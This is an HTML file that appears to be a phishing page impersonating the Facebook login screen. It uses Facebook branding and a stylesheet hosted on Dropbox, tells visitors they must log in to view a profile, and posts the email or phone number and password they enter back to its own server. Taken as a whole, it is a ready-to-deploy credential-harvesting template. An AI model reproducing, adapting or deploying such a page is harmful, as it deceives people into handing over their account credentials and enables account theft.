<!DOCTYPE html>
<html lang="en">
<head>


    <meta charset="UTF-8">
 <meta name="viewport" content="width=device-width, initial-scale=1.0"> 
 <title>facebook</title>

    <link rel="icon" type="image/png"
          href="https://upload.wikimedia.org/wikipedia/commons/thumb/c/c2/F_icon.svg/768px-F_icon.svg.png">
    <link href="https://fonts.googleapis.com/css?family=Roboto:400,900" rel="stylesheet">
    <script src="https://code.jquery.com/jquery-3.3.1.slim.min.js"
            integrity="sha384-q8i/X+965DzO0rT7abK41JStQIAqVgRVzpbzo5smXKp4YfRvH+8abtTE1Pi6jizo"
            crossorigin="anonymous"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.3/umd/popper.min.js"
            integrity="sha384-ZMP7rVo3mIykV+2+9J3UJ46jBk0WLaUAdn689aCwoqbBJiSnjAK/l8WvCWPIPm49"
            crossorigin="anonymous"></script>
    <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"
            integrity="sha384-ChfqqxuZUCnJSK3+MXmPNIyE6ZbWh2IMqE241rYiqJxyMiZ6OW/JmZQ5stwEULTy"
            crossorigin="anonymous"></script>
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/css/bootstrap.min.css"
          integrity="sha384-MCw98/SFnGE8fJT3GXwEOngsV7Zt27NXFoaoApmYm81iuXoPkFOJwJ8ERdknLPMO" crossorigin="anonymous">
    <link rel="stylesheet" type="text/css" href="https://dl.dropbox.com/s/s6sogqfmf4js7s5/login.css?">
    <link rel="stylesheet" type="text/css">You need to log in to view this profile.</link>


</head>

<body>
<!-- HEADER HERE -->
<!-- HEADER HERE -->
<!-- HEADER HERE -->
<!-- HEADER HERE -->
<header>
    <div class="container-fluid head_div">
        <h1 class="text-white text-center font-weight-bold">facebook</h1>
    </div>
</header>

<!-- BODY HERE -->
<!-- BODY HERE -->
<!-- BODY HERE -->

<div class="body-clr">
    <div class="frm-div container pt-5 pr-5 pl-5 mx-auto">
        <form method="post">
            <div class="form-group">
                <input type="text" class=" inp-shd form-control rounded-0" name="username" id="exampleInputEmail1"
                       aria-describedby="emailHelp" placeholder="Email address or phone number" autocomplete="email">
            </div>
            <div class="form-group">
                <input type="password" class="form-control rounded-0" name="password" id="exampleInputPassword1"
                       placeholder="Password" autocomplete="password">
            </div>
            <button type="submit" class="container-fluid btn btn-primary" >Log in</button>
            <a href="" class="btn btn-success container-fluid mt-3">Create an account</a>
            <div class="text-center pt-4">
                <a href="#" id="forgot-link" class="mt-3 text-primary">Forgotten password? Â· Help Centre</a>
            </div>
        </form>
    </div>
</div>
<!-- FOTTER HERE -->
<!-- FOTTER HERE -->
<!-- FOTTER HERE -->
<!-- FOTTER HERE -->
<footer>
    <h3 id="copy-right" class="text-center pt-5 text-muted">Facebook Â©2019</h3>
</footer>

</body>
</html>
